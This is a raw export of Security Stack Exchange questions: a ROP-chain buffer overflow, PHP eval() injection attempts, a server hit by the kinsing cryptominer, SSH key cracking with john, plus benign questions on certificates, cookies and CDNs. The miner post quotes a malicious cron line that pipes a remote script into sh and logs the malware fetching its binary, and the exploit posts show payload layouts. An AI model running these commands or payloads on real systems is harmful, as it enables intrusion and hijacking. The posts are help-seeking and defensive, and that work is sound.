I followed this example: https://medium.com/@nikhilh20/return-oriented-programming-rop-chaining-def0677923ad

+

In addition, there are no suitable gadgets of pop pop ret pattern (actually, there are, but pop [some reg] pop ebp ret, which messes up the stack as well as gadgets with leave instruction).

+

I've tried two different stack paddings for an exploit: the first one is identical to the primer in the link I provided above. The second one is (top - higher addresses, bottom - lower addresses):

+
address of exec_string
+garbage value
+0x0badf00d
+0xcafebabe
+add esp 8; pop ebx; ret <-- gadget
+address of add_sh
+0xdeadbeef
+pop; ret gadget <-- gadget
+address of add_bin <-- compromised instruction pointer after BoF
+AAAA
+....
+112 'A's to overflow the buffer and overwrite ebp (108 + 4)
+....
+AAAA
+
+

Let me explain the add esp, 8; pop ebx; ret gadget. There are no gadgets like pop [some reg]; pop [some reg, not ebp]; ret for chaining calls from add_sh to exec_string functions, so I've tried to make a little hack. I've chosen add esp, 8; pop ebx; ret gadget to pop out 0xcafebabe and 0x0badf00d via add esp,8 then pop out garbage unreferenced value via pop ebx and then ret to exec_string. Does it suppose to work at all? Correct me if I wrong.

+

Moreover, when I've started debugging, it results with:

+

+

Cool, it looks like I owned an instruction pointer, I need to replace it with add_bin function address to jump to it and start a ROP chain.

+

But... +

+

SIGSEGV in 0x91c2b1c2? I've entered a correct add_bin address, ASLR, PIE and canaries are disabled. I thought that maybe there is an undefined reference to string that vulnerable_function gets, but in primer in the link provided above it was ignored, so it confused me a lot.

+",213386,,-1,,6/16/2020 9:49,1/13/2020 2:26,Cannot build a ROP chain,,2,0,,,,CC BY-SA 4.0 +224062,1,224065,,1/12/2020 4:03,,4,225,"

If a device uses full disk encryption such as LUKS, BitLocker (with a pin), Veracrypt and others and boots using a complex password, what is the need for complex passwords to log into the operating system thereafter and why?

+",224867,,,,,1/12/2020 17:38,Should operating system passwords be complex if full disk encryption is used that has a complex passphrase?,,3,0,,,,CC BY-SA 4.0 +224064,1,224067,,1/12/2020 4:33,,-1,102,"

Since I configured my smartphone Access Point Name (APN) of the type APN protocol from including the value IPv4 to including the value IPv4/IPv6, generally all different addresses I got after restarting my smartphone about 10 times, started with:

+ +
+

2001:44c8:

+
+ +

44c8 seems to me to stand for ""Bangkok, Thailand"".

+ +

Although the question might seem absurd;
+Is there is any way, besides surfing through a proxy IP address, for hiding rough whereabouts of a machine with IPv6?

+",,user123574,,,,1/12/2020 4:50,"Hiding rough whereabouts of a machine with IPv6, without using a proxy",,1,2,,,,CC BY-SA 4.0 +224069,1,,,1/12/2020 7:06,,1,144,"

CDN are said to absorb and mitigate the Denial of Service and DDOS attacks. Consider an application that uses a CDN provider to deliver its content. So if an attacker tries to bring down such an application using DOS or DDOS, the flood of requests made during such an attack will go to the CDN servers. Will such a DDOS attack have to completely bring down all the CDN servers serving this application's content before impairing the origin server completely?

+",224882,,,,,1/19/2020 16:05,Does a DDOS attack on an application using CDN have to first bring down all the involved CDN servers to affect the application's availability?,,1,0,,,,CC BY-SA 4.0 +224070,1,,,1/12/2020 7:14,,-4,503,"

I'm not sure if an administrator can see my screen while I use my computer, can someone provide an answer with an explanation of how they can do it? I have an administrator on my computer, but not school level security where they have things installed.

+",224883,,224885,,1/12/2020 9:50,1/12/2020 16:21,Can an administrator see screen time when I use my computer?,,2,3,,1/17/2020 6:19,,CC BY-SA 4.0 +224078,1,,,1/12/2020 15:16,,1,642,"

I'm trying to bypass a page that has an eval() and it works like this:

+ +
POST /anything.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+
+parameter1=aaa&parameter2=asdfas!-->
+
+<?php echo ""<p>1234</p>"");
+
+?>
+
+ +

And the result in the response is:

+ +
Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => aaa
+    [parameter2] => asdfas!-->
+
+
+<?php echo ""<p>11</p>"");
+?>
+
+)
+</pre>-->
+
+ +

The result when I render page is:

+ +
Common, debugging: 11
+"");?>)-->
+
+ +

I have tried many things, such as trying to escape the single and double quotes but I have not been able to get the Bypass. I only get errors when the eval()d' error page is rendered.

+ +

For example, if I put in the request:

+ +
<?php echo 'a';
+
+ +

The response is:

+ +
<br />
+<b>Parse error</b>:  syntax error, unexpected 'a' (T_STRING) in <b>/var/www/html/anything.php(10) : eval()'d code</b> on line <b>5</b><br />
+ Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => aaa
+    [parameter2] => asdfas!-->
+
+
+<?php echo 'a';
+
+?>
+
+)
+</pre>-->
+
+ +

Could someone please point me in the direction of bypass? Thank you very much.

+ +

Edited:

+ +

From what I've noticed, every time I put a code like this:

+ +
<?php echo(1); ?>
+
+ +

I become the page like this:

+ +
<!--?php echo(1); ?-->
+
+ +

I have seen in the next part and it works for me to execute an alert in Javascript, but it doesn't work for me to do the Bypass for PHP:

+ +

Exploiting PHP via GET params

+ +

My request:

+ +
POST /anything.php HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 126
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+parameter1=anything1&parameter2=anything2</pre>.""!-->
+
+<!--  --><script>alert('Success');</script><!--  -->
+
+ +

Response:

+ +
HTTP/1.1 200 OK
+Date: Sun, 10 Jan 2020 23:26:34 GMT
+Server: Apache/2.x.x
+X-Powered-By: PHP/5.4
+Content-Length: 406
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<br />
+<b>Parse error</b>:  syntax error, unexpected 'Success' (T_STRING) in <b>/var/www/html/anything.php(13) : eval()'d code</b> on line <b>3</b><br />
+Common, debugging: <!-- print the array method _POST: <pre>Array
+(
+    [parameter1] => anything1
+    [parameter2] => anything2</pre>.""!-->
+
+<!--  --><script>alert('Success');</script><!--  -->
+
+)
+</pre>-->
+
+ +

And the alert is successfully executed.

+",224899,,224899,,1/12/2020 23:30,1/12/2020 23:30,How to abuse eval() in PHP,,0,8,,,,CC BY-SA 4.0 +224079,1,,,1/12/2020 16:07,,2,1286,"

Trying to get certificate v3, but getting v1. I'm using following commands:

+ +
openssl req -out server.csr -newkey rsa:2048 -nodes -keyout server.key -config san_server.cnf
+openssl ca -config san_server.cnf -create_serial -batch -in server.csr -out server.crt
+
+ +

Configuration file san_server.cnf content:

+ +
[ca]
+default_ca=CA_default
+
+[CA_default]
+dir=./ca
+database=$dir/index.txt
+new_certs_dir=$dir/newcerts
+serial=$dir/serial
+private_key=./ca.key
+certificate=./ca.crt
+default_days=3650
+default_md=sha256
+policy=policy_anything
+copy_extensions=copyall
+
+[policy_anything]
+countryName=optional
+stateOrProvinceName=optional
+localityName=optional
+organizationName=optional
+organizationalUnitName=optional
+commonName=optional
+emailAddress=optional
+
+[req]
+prompt=no
+distinguished_name=req_distinguished_name
+req_extensions=v3_req
+x509_extensions=v3_ca
+
+[req_distinguished_name]
+countryName=EN
+stateOrProvinceName=Some-State
+localityName=London
+organizationName=Internet Widgits Pty Ltd
+commonName=192.168.1.8
+
+[v3_req]
+subjectAltName=@alt_names
+
+[v3_ca]
+subjectAltName=@alt_names
+
+[alt_names]
+IP.1=127.0.0.1
+IP.2=192.168.1.8
+DNS.1=localhost
+
+ +

As a result I got v1 certificate. How to create v3 one?

+",161270,,161270,,1/12/2020 20:43,2/12/2020 13:03,Generate certificate v3 instead of v1,,1,0,1,,,CC BY-SA 4.0 +224081,1,,,1/12/2020 16:50,,3,770,"

For a few weeks, someone, probably a bot keep installing a bitcoin miner on my server, I find it because it is taking all the CPU. The process name is kdevtmpfsi located at /tmp/kdevtmpfsi, there's watch dog process kinsing located at /var/tmp/kinsing and a cronjob:

+ +
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
+
+ +

I keep removing the trace above, but the attacking keep re-injecting, using the same exploit which must be tie to the apache2 process because here's what I find in my apache2 error log:

+ +
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+
+  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: 2: ulimit: error setting limit (Operation not permitted)
+rm: cannot remove '/var/log/syslog': Permission denied
+
+100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k
+chattr: Permission denied while setting flags on /tmp/
+chattr: Permission denied while setting flags on /var/tmp/
+ERROR: You need to be root to run this script
+iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root)
+Perhaps iptables or your kernel needs to be upgraded.
+sudo: no tty present and no askpass program specified
+sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied
+sh: 11: cannot create /etc/sysctl.conf: Permission denied
+userdel: user 'akay' does not exist
+userdel: user 'vfinder' does not exist
+chattr: Permission denied while trying to stat /root/.ssh/
+chattr: Permission denied while trying to stat /root/.ssh/authorized_keys
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+grep: Trailing backslash
+grep: write error: Broken pipe
+kill: (56): Operation not permitted
+kill: (25879): No such process
+kill: (25886): No such process
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+(Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+pkill: killing pid 807 failed: Operation not permitted
+pkill: killing pid 836 failed: Operation not permitted
+pkill: killing pid 836 failed: Operation not permitted
+log_rot: no process found
+chattr: No such file or directory while trying to stat /etc/ld.so.preload
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
+rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
+rm: cannot remove '/var/tmp/lib': No such file or directory
+rm: cannot remove '/var/tmp/.lib': No such file or directory
+chattr: No such file or directory while trying to stat /tmp/lok
+chmod: cannot access '/tmp/lok': No such file or directory
+sh: 477: docker: not found
+sh: 478: docker: not found
+sh: 479: docker: not found
+sh: 480: docker: not found
+sh: 481: docker: not found
+sh: 482: docker: not found
+sh: 483: docker: not found
+sh: 484: docker: not found
+sh: 485: docker: not found
+sh: 486: docker: not found
+sh: 487: docker: not found
+sh: 488: docker: not found
+sh: 489: docker: not found
+sh: 490: docker: not found
+sh: 491: docker: not found
+sh: 492: docker: not found
+sh: 493: docker: not found
+sh: 494: docker: not found
+sh: 495: docker: not found
+sh: 496: docker: not found
+sh: 497: docker: not found
+sh: 498: docker: not found
+sh: 499: setenforce: not found
+sh: 500: cannot create /etc/selinux/config: Permission denied
+Failed to stop apparmor.service: Interactive authentication required.
+See system logs and 'systemctl status apparmor.service' for details.
+Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
+Executing: /lib/systemd/systemd-sysv-install disable apparmor
+Failed to reload daemon: Interactive authentication required.
+update-rc.d: error: Permission denied
+Failed to stop aliyun.service.service: Interactive authentication required.
+See system logs and 'systemctl status aliyun.service.service' for details.
+Failed to disable unit: Interactive authentication required.
+sh: echo: I/O error
+md5sum: /var/tmp/kinsing: No such file or directory
+sh: echo: I/O error
+sh: echo: I/O error
+--2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing
+Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ...
+Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 17072128 (16M) [application/octet-stream]
+Saving to: '/var/tmp/kinsing'
+
+     0K .......... .......... .......... .......... ..........  0% 1.54M 11s
+    50K .......... .......... .......... .......... ..........  0% 3.62M 7s
+   100K .......... .......... .......... .......... ..........  0% 5.97M 6s
+   150K .......... .......... .......... .......... ..........  1% 7.92M 5s
+ 16500K .......... .......... .......... .......... .......... 99% 11.5M 0s
+ 16550K .......... .......... .......... .......... .......... 99% 9.01M 0s
+ 16600K .......... .......... .......... .......... .......... 99% 11.3M 0s
+ 16650K .......... .......... ..                              100% 28.2M=1.5s
+
+2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]
+
+sh: echo: I/O error
+sh: echo: I/O error
+ +

This is in apache2 main error log file (/var/log/apache2/error.log) and no in my website error log so I am thinking that it is not related to my php code, what should I do/check next?

+",224902,,,,,1/12/2020 19:53,A bitcoin miner is getting install on my web server with the apache2 process,,0,5,,1/12/2020 20:06,,CC BY-SA 4.0 +224082,1,224091,,1/12/2020 17:13,,1,137,"

Scope: penetration testing of web server with critical information in it (user management).

+ +

I had an argument with my college about security in web sockets and I got stuck with him in one topic, which is the following:

+ +
    +
  • Is it secure to let any inbound connection into the web-socket +without filtering the source of the connection?
  • +
+ +

Let me explain my opinion on that:

+ +
    +
  • Only an authorized user (by a certain cookie which is on the server already) can connect to the web-sockets gateway (WSG) via +server S, then happens the handshake, 101, and the communication +starts.
  • +
+ +

His opinion is that:

+ +
    +
  • Every user, no matter whether it has the cookie or not, can query the +web-socket gatewa y.
  • +
+ +

From my point of view, if we allow any connection request to the web-socket gateway, it may result into:

+ +
    +
  1. Unrestricted flood.
  2. +
  3. Scans.
  4. +
  5. Exploitation of possible vulnerability of the server to extract sensitive data.
  6. +
+ +

What do you think?

+",212252,,212252,,1/12/2020 17:27,1/12/2020 22:58,Security in web sockets,,1,3,,,,CC BY-SA 4.0 +224088,1,,,1/12/2020 21:37,,2,923,"

Since the GDPR landed, many websites have to inform you about their cookie usage and give you an option to enable/disable them for provider and for reason of storage. Say that I find a link I want to read but they ask for consent of storing cookies in my device (which I would rather not, if possible)

+ +

Am I fine if I open a private/incognito window and accept all cookies there and close it after I'm done?

+ +

The reason behind this is because having to withdraw consent of all links I click quickly becomes a tedious task. Please also note that disabling cookies is not an option for two reasons: there are sites from which I want to store cookies and I intend to do this in all of my devices, not only in a specific system

+",224900,,,,,1/12/2020 22:15,"Is there any drawbacks of ""accepting all cookies"" while in incognito mode?",,1,0,,,,CC BY-SA 4.0 +224090,1,,,1/12/2020 22:32,,1,368,"

Do E-Mail proxy services exists to improve privacy and security?

+ +

Privacy in the sense that one wouldn't need to give a website his/her username (possibly even in the firstname.lastname@domain.tld form) and in a security sense that the used e-mail couldn't be used to log into the e-mail service (thereby making it useless for a leaked password, because the e-mail address couldn't be used to login).

+ +

Example:

+ +

john.doe@gmail.com could be someone's e-mail. If there were a Google Privacy/Proxy service then one could generate as many random e-mails as possible and if one would be sent spam to, or leaked, it could be disabled:

+ +
    +
  • abcdef@gmail.proxy
  • +
  • 290dcef@gmail.proxy
  • +
+ +

could both redirect mail to john.doe@gmail.com.

+ +

One could be blocked/disabled/removed if wanted without abandoning the real account (e.g. because 290dcef@gmail.proxy has been compromised or spam is being sent to it).

+ +

Would it really improve security and privacy? Or am I missing something?

+ +

And does such a service exist? (as a bonus, replying from such proxy e-mails would be even better, converting the real account from field to the proxy mail address)

+",65956,,65956,,1/12/2020 22:38,4/4/2022 13:07,E-Mail privacy proxy for hiding real e-mail?,,4,2,,,,CC BY-SA 4.0 +224101,1,224104,,1/13/2020 8:16,,1,98,"

I know that if an application set debuggable to true in the manifest a user with physical access can debug the application and get access to the private directory of the debuggable application.

+ +

But is it possible from another installed app to exploit the debuggable application or is it only exploitable with physical access ?

+ +

Thank you.

+",224934,,,,,1/13/2020 9:49,Is a debuggable android application exploitable from another application?,,1,0,,,,CC BY-SA 4.0 +224109,1,224283,,1/13/2020 11:29,,4,34270,"

I am trying to crack a password protected id_rsa, with john the ripper. But it doesn't find the correct password for some reason.

+ +

I have create a new user and generated a new id_rsa with ssh-keygen (the password used is ""password"").

+ +
pwn@kali:~$ ls -l .ssh/                                                   
+total 4                                                                   
+-rw-r--r-- 1 pwn pwn 222 janv. 10 18:10 known_hosts                       
+
+pwn@kali:~$ ssh-keygen                                                    
+Generating public/private rsa key pair.                                   
+Enter file in which to save the key (/home/pwn/.ssh/id_rsa):              
+Enter passphrase (empty for no passphrase):                               
+Enter same passphrase again:                                              
+Your identification has been saved in /home/pwn/.ssh/id_rsa.              
+Your public key has been saved in /home/pwn/.ssh/id_rsa.pub.              
+The key fingerprint is:                                                   
+SHA256:mYmLGXR2b8Au7d41sZukTEAIhRQI8UAtQHWf2xnF/ug pwn@kali               
+The key's randomart image is:                                             
++---[RSA 3072]----+                                                       
+|O=o++=.   ..     |                                                       
+| +..o..o. ..     |                                                       
+|  o . +o=..      |                                                       
+|   . o *o*o.     |                                                       
+|    . o.Soo +    |                                                       
+|     + + o . +   |                                                       
+|    o . . o =    |                                                       
+|       . + E +   |                                                       
+|        . + o    |                                                       
++----[SHA256]-----+                                                       
+pwn@kali:~$                                                               
+
+pwn@kali:~$ ls -l .ssh/                                                   
+total 12                                                                  
+-rw------- 1 pwn pwn 2635 janv. 13 12:05 **id_rsa**                           
+-rw-r--r-- 1 pwn pwn  562 janv. 13 12:05 **id_rsa.pub**                       
+-rw-r--r-- 1 pwn pwn  222 janv. 10 18:10 known_hosts                      
+
+ +

The result is the following file :

+ +
pwn@kali:~$ cat ~/.ssh/id_rsa                                         
+-----BEGIN OPENSSH PRIVATE KEY-----                                   
+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
+hF2Y9w==                                                              
+-----END OPENSSH PRIVATE KEY-----                                     
+
+ +

I have used ssh2john to create a file crackable by john:

+ +
# /usr/share/john/ssh2john.py id_rsa 
+id_rsa:$sshng$2$16$78b3f467a4d959ebb78a6cb995826c8d$1894$6f70656e7373682d6b65792d7631000000000a6165733235362d63747200000006626372797074000000180000001078b3f467a4d959ebb78a6cb995826c8d000000100000000100000197000000077373682d7273610000000301
+00010000018100ccf00ae75735e47c194add92468ba57346e879344bbf6919859088c4bda858427133048beb34add55c19281abbb54d3c46c29e21ff2510ff76f6251d87d48bac392f6226c4f30e12ea640248780d6ca5f9c811cb2b6af99f33c2bd57fad3ff6e4aaa9481e2df0655874674aebef842176
+539dcd879e204a6b9e6d1656f47c10e2da00bdb38e20299c978bc9015fb3c89d58614dc8c950248d76c4085f42d5c449da1fa37ead889297f7234e858ec9b04bed0e86695297b7ecf3f60a0536fd5bfb070edf7c896d1661414224efb5447d1420e26014fa5ce6241551e12368a50c2ff5f471d7a6508c8
+4875741c6fec8337018bba56abe3781d4323dea934c4f27972b8b9cbdaa711fffa822358cc85cc3b583955c01ef24fe294ce1b969527b01197dedb03990c36fafa3eeba6a82a73fbae935955e0775bfc458676512d60d0c72f5787bc45f6fe00c23cd19b83da20d836942ac0e3dc5b465ee52e5e5fac6f3
+c880ee1c4541ebd65f812926249652b1305db157eeb23edf30456de2529fb71c500000580a8c2691c0e3dcf3ebad9903e8a68df56241aa7d0dace3f744b5d69e4c87e2d7d9e1102d6dc52c64393dec3a1690725667a36556ab84e3e559fb22aab986cc304e65a7ba148707ca9d7b31957900d47055596a6
+72ba8cafcabbff82aa36422fa6c56eb727995c9f1e5508993b3119719ab446ef195ee7a8e2d0153adf34d5546052081547e40c92a174f11cf417ff8761ef913fa0e7844b9f3c351f40f978c5adc46cf93c734e743158757f1c254d499e1e15d0c075a84dc38d38dfb6c985f235f93d4efed9639d2675d95
+f246d38279a18ac7cc39b5d7bc433d6f1937b655edc5973331059789b91054c2f7b634119a1dd0f59019a83ce79e0161a491e96f812c08055abeda65478d905e936bd4302f98b10ba1ff3a607077c6b554598b080c1dbb1e2636216ef34958039ceeb8a603049ff3e610ecb4b2a1e576fac657e5bf20359
+a01e69cc21a9b6ef2be64cf0d7dbf759a080b331ccd5f0dc29164292c70bd271bc856382a6eaa03aab97be6394bfeaaebf476b84c72cae5f615548ccebb23066e53adbbb696181495a1c10a8860a8434e19fa6b2a366ca6350bb99bc5e5f502f3990d91e920f5eca6e50a8a5cb6d597f49498261e9c0e65
+28fe194f912a0390dd0c0db0a006dd6b1e071b73bc5dfc82e0e289297466d7265e49b7191f70c29d92ed41a0b3a7c181fd10278fe826c6e9db64033246a60ad10a4fc885fcb73a3745e82f150ba427beb243d300c8c9b4555e13c4862b867b442f3f4cafcea2b2bd639a9cb2d7ec3d0d8be0142066563db
+792403234776c7191ade460f68220bf9229e30a64f5834827484dc0628f62fcbfd83a437eaa2c7419b09bc396cf2d6604858627d1eb28ee3cedf6f0cf1b01d5241772d74d7ea1a9f4a366f13f4a5ab0425c20c223b446f368d2d0e91b043d880a03ee00a54c9e190e5b700cf21198c9c77b0349a5307506
+e23687b3f6339d13b206156c19af2f51c51196fed7be20cbaea950f9714c5e012f455c1511319220351cf8e467f50d4df9d9d1b215030fc529e18dfd55611f8211864019736c3947204583937408c24005e6507f42d651dab5d68d652380722adac120155f814d36f42b4c4bd72b74b0e377c232b8b92f9
+a97c73eaa50417d9d50c93d0b6ac8f8036fdac99149906215e76273362a1780369cd152b3c86aa5f250e70535a58ca2bc854395e0f8b267f056b43e4c24a79fa9157be0a3daeecd5c0a18dda6088cf3378753731275c8e1568266ad920538755479f31e0d082f514bb2f8dd46474fcdb84dc919e38feacc
+27f1cecddbcb3371c1901c991b77df44c1959b4dc88f19ffb4ea190e7312b2a220a5c7b408c6148dfbf192311061cd1046244ba9978c0a44daa0808ee99d4b2df26aaf22fafb2e78d6996c2b118b2e17c36da27476a38cd24c18c0c7c675b50d38648b0db59385604832a3cff835a50d23e9c309ee298ee
+4cf078d0a546a2be131f283d7f4be3ce3e988b58cce2d0ff3dc0f3e66b52391ecd666a0017945d3e0148e88eb782e37597486657ee872f92ed2afea2c3d58ae96624274b3578299e3cfebe508e5f31d817cee7ac546718935cadc34ee55c73ed039ec282947bf7699eded4a73c7673158666c5cf6eb1344
+d66f104c8b7ef151b05e408bc9134395443d19707b872ab7f3e20d8e32559a2d0cd6fbad8ed6312151add37badf2f3fddeec68dca80da80a08ff5981970739136f6b9cfaf5739a4aa9e8fc4e6aa9a654c8cf1fc83f6a72b64993e0f6640fb0854e481a93543610d3432ce14285fa6d37c912cd2d9a98daf
+c61963de122726c20652c196d8ba6d29c413f553c8b70c03311beae46d3a009dd6f21cf3b29524cfb7807f13b95ae53fe84016a73dff5ad4b70d8571886f55f405dbf3eb379a6ebb63ce200e9016b253e349d832c75ca3315a203ba973468486bdd4f54b2a8eeac4638b52111be47ef07fcc031d9163549
+97f92b52383f3845d98f7$16$486                               
+
+
+# /usr/share/john/ssh2john.py id_rsa > id_rsa.hashes
+
+ +

But john don't find the password ""password"" using a wordlist that contain ""password"" in 4th position.

+ +
# grep -x password -n /usr/share/wordlists/rockyou.txt
+4:password
+
+# john -w /usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hashes 
+Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
